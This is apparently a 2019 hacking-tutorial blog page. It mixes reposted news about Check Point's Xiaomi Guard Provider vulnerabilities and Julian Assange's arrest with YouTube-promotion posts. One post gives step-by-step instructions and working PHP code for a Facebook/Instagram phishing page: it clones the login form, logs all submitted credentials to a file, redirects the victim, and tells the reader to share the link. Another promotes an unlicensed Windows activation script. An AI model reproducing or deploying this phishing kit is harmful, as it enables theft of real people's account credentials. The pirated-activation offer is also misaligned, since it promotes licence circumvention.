Best Deals

Breaking

Friday, April 12, 2019

Friday, April 12, 2019

Flaws in Pre-Installed security App on Xiaomi Phones open to hack them

Flaws in Pre-Installed security App on Xiaomi Phones open to hack them


Bad news for the owners of Xiaomi smartphones, a pre-installed security application could be used as a backdoor by hackers.
Security experts at CheckPoint have discovered that a security app, called Guard Provider, that is currently pre-installed on more than 150 million Xiaomu devices is affected by multiple vulnerabilities issues that could have allowed remote hackers to gain the control of the phones.

“Check Point Research recently discovered a vulnerability in one of the preinstalled apps in one of the world’s biggest mobile vendors, Xiaomi, which with almost 8% market share ranks third in the mobile phone market. Ironically, it was the pre-installed security app, ‘Guard Provider’ (com.miui.guardprovider), which should protect the phone by detecting malware, which actually exposes Checkpointthe user to an attack.” reads the post published by CheckPoint.


“Briefly put, due to the unsecured nature of the network traffic to and from Guard Provider, a threat actor could connect to the same Wi-Fi network as the victim and carry out a Man-in-the-Middle (MiTM) attack.”
Guard Provider is developed by Xiaomi that includes three antivirus software, Avast, AVL, and Tencent, and allows users to choose the one they prefer.
The security app works as a sort of aggregator, it allows to include 3rd-party software within a single app. Experts argued that it uses several Software Development Kits (SDKs), potentially opening the doors to the attackers through the compromise of one of them.
The experts pointed out that the SDK share the same app context and permissions, these main problems resulting from this implementation are:

  1. A problem in one SDK would compromise the protection of all the others.
  2. The private storage data of one SDK cannot be isolated and can therefore be accessed by another SDK.
Checkpoint experts discovered that the application was receiving antivirus signature updates through an unsecured HTTP connection, allowing attackers to carry out man-in-the-middle attacks when sharing the same WiFi network. Then the attackers can intercept the Xiaomi device connection and push malicious updates.
Experts at CheckPoint demonstrated how get remote code execution on the targeted Xiaomi device after exploiting four vulnerabilitues in two different SDKs available in the app.
The researchers exploited the use of unsecured HTTP connection to deliver software updates, a path-traversal vulnerability during the decompression process to overwrite files in the app’s sandbox (including files related to another SDK) and the lack of digital signature verification for update process.
Check Point reported the vulnerabilities to Xiaomi that quickly addressed them and released a new version of the Guard Provider app.
It is completely understandable that users would put their trust in smartphone manufacturers’ preinstalled apps, especially when those apps claim to protect the phone itself. This vulnerability discovered in Xiaomi’s ‘Guard Provider’, however, raises the worrying question of who is guarding the guardian. And although the guardian should not necessarily need guarding, clearly when it comes to how apps are developed, even those built in by the smartphone vendor, one cannot be too careful.” concludes Checkpoint.
“The above attack scenario also illustrates the dangers of using multiple SDKs in one app. While minor bugs in each individual SDK can be often be a standalone issue, when multiple SDKs are implemented within the same app it is likely that even more critical vulnerabilities will not be far off.”
Friday, April 12, 2019

WikiLeaks Founder Julian Assange arrested and charged in US with computer hacking conspiracy

WikiLeaks Founder Julian Assange arrested and charged in US with computer hacking conspiracy


Seven years ago, WikiLeaks founder Julian Assange took refuge in the embassy to avoid extradition to Sweden over a sexual assault case.

In 2012 a British judge ruled WikiLeaks founder Julian Assange should be extradited to Sweden to face allegations of sexual assault there, but Assange received political asylum from Ecuador and spent the last years in its London embassy.

In October, the Government of Ecuador confirmed it had cut the internet access of WikiLeaks founder Julian Assange due to leaks of its Organization. The Ecuadorian Government believes that the information leaked by Wikileaks could have had a serious impact on the US Presidential election.

News of the day is that Julian Assange was arrested in London on a US warrant charging him over his alleged role in a massive leak of military and diplomatic documents in 2010.






Wikileaks founder Julian Assange is arrested at the Ecuadorian embassy in London – Source the Time of Israel

According to a note released by London’s Metropolitan Police Service, the arrest has happened just after the Ecuadorian government today withdraws the political asylum. Below the Tweet published by
 Ecuadorian President Lenín Moreno:






Ecuador decidió soberanamente retirar el asilo diplomático a Julian Assange por violar reiteradamente convenciones internacionales y protocolo de convivencia.


Wikileaks condemned the arrest and defined it as an illegal act that violated international law:



The man has been taken into custody at a central London police station, and it is expected to be presented before Westminster Magistrates’ Court as soon as possible.
“He has been taken into custody at a central London police station where he will remain, before being presented before Westminster Magistrates’ Court as soon as is possible.” reads the note.
“The MPS had a duty to execute the warrant, on behalf of Westminster Magistrates’ Court, and was invited into the embassy by the Ambassador, following the Ecuadorian government’s withdrawal of asylum.”
The U.S. Department of Justice also published a press release that confirmed the arrest. Assange would face extradition proceedings for his alleged role in “one of the largest compromises of classified information in the history of the United States.”
“The indictment alleges that in March 2010, Assange engaged in a conspiracy with Chelsea Manning, a former intelligence analyst in the U.S. Army, to assist Manning in cracking a password stored on U.S. Department of Defense computers connected to the Secret Internet Protocol Network (SIPRNet), a U.S. government network used for classified documents and communications.” states the US DoJ. “Manning, who had access to the computers in connection with her duties as an intelligence analyst, was using the computers to download classified records to transmit to WikiLeaks “
Assange faces up to five years in jail on a federal charge of “conspiracy to commit computer intrusion for agreeing to break a password to a classified US government computer”.
Last year, U.S. prosecutors accidentally revealed the existence of criminal charges against Julian Assange in a document filed in an unrelated sex crime case.
Assange has been forced to live in London’s Ecuadorian Embassy since June 2012, when a U.K. court ordered his extradition to Sweden to face sexual assault and rape charges filed against him.
According to Assange’s US lawyer Barry Pollack the arrest constitutes “an unprecedented effort by the United States seeking to extradite a foreign journalist to face criminal charges for publishing truthful information.”

Monday, April 01, 2019

Monday, April 01, 2019

Windows 10 Pro Activation Free 2019 All Versions Without Any Software Or...





Windows 10 Pro Activation Free 2019 All Versions Without Any Software Or Product Key

🕵DISCLAIMER:Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and Kali Tutorials will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

👇SUBSCRIBE
https://www.youtube.com/faizanalihackvines

MY INSTAGRAM ID:
https://www.instagram.com/faizann_ali/

facebook page;
https://www.facebook.com/pg/hackvines.faizan

👋Hey Guys in this video

let me show a a batch programming file which will help you to activate the windows.

STEP 1:COMMENT TO GET THE FILE

STEP 2:DOWNLOAD THE FILE.

STEP 3:CHANGE FILE NAME FROM TXT TO ".BAT"

STEP 4:RUN IT  AS ADMINISTRATOR.

STEP 5:LET IT TAKE TIME,WAIT FOR 5 MINUTES.

DONE !!

I hope you guys learn from this course and share it with everyone.

DON'T FORGET TO SUBSCRIBE TO MY CHANNEL.



                                                   LIKE👍
                                              COMMENT🗣
                                                 SHARE👬👫
                                             SUBSCRIBE✌🤘



other tags:

windows 10,windows 10 pro,activate windows 10,activator windows 10,windows 10 activation 2018,windows 10 pro activation 2018,windows pro 2018,windows activation 2018,latest windows activation 2018,windows 10 pro activation,windows 10 activator 2018,activation key,key,windows pro,windows 10 key,windows 10 pro product key,faizan ali,windows activation 2019,windows 10 enterprise activation 2019,2019 windows 10 all versions activation,windows 10 activator

Thursday, March 21, 2019

Thursday, March 21, 2019

LATEST GOOGLE DORKS PRACTICAL || What is Google Dork| HOW TO USE GOOGLE ...





LATEST GOOGLE DORKS PRACTICAL || What is Google Dork-FAIZAN ALI

🕵DISCLAIMER:Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and Kali Tutorials will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

👇SUBSCRIBE
www.youtube.com/faizanalihackvines

👋Hey Guys

As you know google is a very powerful search engine,so there are some tricks that is very important to learn called google dorks,
you should know how to use GOOGLE DORKS.

GOOGLE DORKS IS A SEARCHING TECHNIQUE WHICH IS USED TO SORT AND SEARCH A SPECIFIC OBJECTS.

A Google dork query, sometimes just referred to as a dork, is a search string that uses advanced search operators to find information that is not readily available on a website. Google dorking, also known as Google hacking, can return information that is difficult to locate.

I hope you guys learn from this course and share it with everyone.

DON'T FORGET TO SUBSCRIBE TO MY CHANNEL.

MY INSTAGRAM ID:
https://www.instagram.com/faizann_ali/

facebook page;
https://www.facebook.com/pg/hackvines.faizan

                                                   LIKE👍
                                              COMMENT🗣
                                                 SHARE👬👫
                                             SUBSCRIBE✌🤘

Tuesday, March 12, 2019

Tuesday, March 12, 2019

INSTAGRAM AND FACEBOOK LATEST PHISHING PAGE || HOW TO CREATE INSTAGRAM/F...





HOW TO CREATE INSTAGRAM/FACEBOOK PHISHING PAGE 2019

INSTAGRAM AND FACEBOOK LATEST PHISING PAGE

🕵DISCLAIMER:Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and Kali Tutorials will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

👇SUBSCRIBE
https://www.youtube.com/faizanalihackvines

👋Hey Guys in this video i am telling you about
INSTAGRAM AND FACEBOOK LATEST PHIShing

So basically i get a lot of request on making a instagram and facebook phishing page so that everyone can do facebook and instagram hacking stuff.



Making a facebook phishing page is but when we try making instagram page then it is difficult task.











So, i make a video on my channel for both of them.






STEPS TO CREATE A FACEBOOK PAGE





STEP1:GO TO OFFICIAL FACEBOOK WEBSITE.

STEP2:RIGHT CLICK ON THE PAGE AND THEN CLICK ON PAGE SOURCE.

STEP3:COPY THIS SOURCE CODE AND SAVE IT AS index.htm

STEP4:OPEN index.htm AND PRESS CTRL+F.

STEP5:WRITE action= ON THE FIND TAB.

STEP6:YOU WILL FIND 3 RESULTS CHANGE THE FIRST action="https://www.facebook.com/......" TO action="post.php".

STEP7:SAVE IT.

STEP8:PASTE THE BELOW CODE IN NOTEPAD AND SAVE IT AS post.php

CODE>>>

 <?php
header ('Location: https://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n\n\n\n");
fclose($handle);
exit;
?>


STEP9:UPLOAD THESE 2 FILES ON SERVER.

STEP10.SHARE YOUR LINK AND THEN DONE.VOILLA !!



 DROP A  COMMENT AND LIKE ON VIDEO TO GET THE LINK.


I hope you guys learn from this video and share it with everyone.

DON'T FORGET TO SUBSCRIBE TO MY CHANNEL.

MY INSTAGRAM ID:
https://www.instagram.com/faizann_ali/


facebook page;
https://www.facebook.com/pg/hackvines.faizan

                                                   LIKE👍
                                              COMMENT🗣
                                                 SHARE👬👫
                                             SUBSCRIBE✌🤘






Thursday, March 07, 2019

Thursday, March 07, 2019

TRUTH-HOW HACKERS HACK FACEBOOK AND INSTAGRAM ACCOUNT| IS IT POSSIBLE ? ...





REALITY OF YOUTUBE VIDEOS BASED ON FACEBOOK AND INSTAGRAM HACKING.


🕵DISCLAIMER:Any actions and or activities related to the material

contained within this Website is solely your responsibility.The misuse

of the information in this website can result in criminal charges

brought against the persons in question. The authors and Kali Tutorials

will not be held responsible in the event any criminal charges be

brought against any individuals misusing the information in this website

to break the law.


👇SUBSCRIBE

https://www.youtube.com/channel/UCjxD...


👋Hey Guys in this video i am telling about the sad reality of

youtube videos and a massive question asked by a person to a tech guys.





IT IS NOT POSSIBLE TO HACK FACBOOK LIKE IT SEEMS IN MOVIES,
NO WEBSITE PROVIDE THESE SERVICES.

If you find any of these website or videos just report them or either not use.
 They create these websites to get a high amount of views.

SO Watch this video to you will understand much more better.

I hope you guys learn something new and please share it with everyone.

DON'T FORGET TO SUBSCRIBE TO MY CHANNEL.


MY INSTAGRAM ID:

https://www.instagram.com/faizann_ali/

facebook page;

https://www.facebook.com/pg/hackvines...

LIKE👍

COMMENT🗣

SHARE👬👫

SUBSCRIBE✌🤘

Monday, March 04, 2019

Monday, March 04, 2019

TECHNICAL SAGAR COURSE REVIEW || BUY OR NOT? || EXPOSED [NEW]








Please watch: "Ep 2|| VIRTUAL LAB CONCEPT EXPLAINED || 2018 Ceh"


#technical_sagar #faizarmy
Hey guys faizan is back with a new channel and this time again i came up with good thoughts to help people i know in return i will not get anything from you guys.

INSTA:@faizann_ali

DISCLAIMER:THIS VIDEO IS JUST BASED ON MY REVIEWS PEOPLE HAVE DIFFERENT OPINIONS BUT ONE HAS TO COME FORWARD TO SHOW THE RIGHT PATH,
I DON'T WANT ANY FIGHTS OR DISPUTES.

IN THIS VIDEO I AM SUGGESTING YOU ABOUT TECHNICAL SAGAR HAKING COURSE,WHETHER YOU SHOULD BUT OR NOT??

DID HE LOOTS PEOPLE.
SO HERE IS THE SAD TRUTH SO HOPE YOU LIKE THIS VIDEO PLEASE MAKE SURE TO
                                            LIKE
                                          SHARE
                                      SUBSCRIBE
                                       COMMENT
SEE YOU IN THE NEXT VIDEO PEACE :)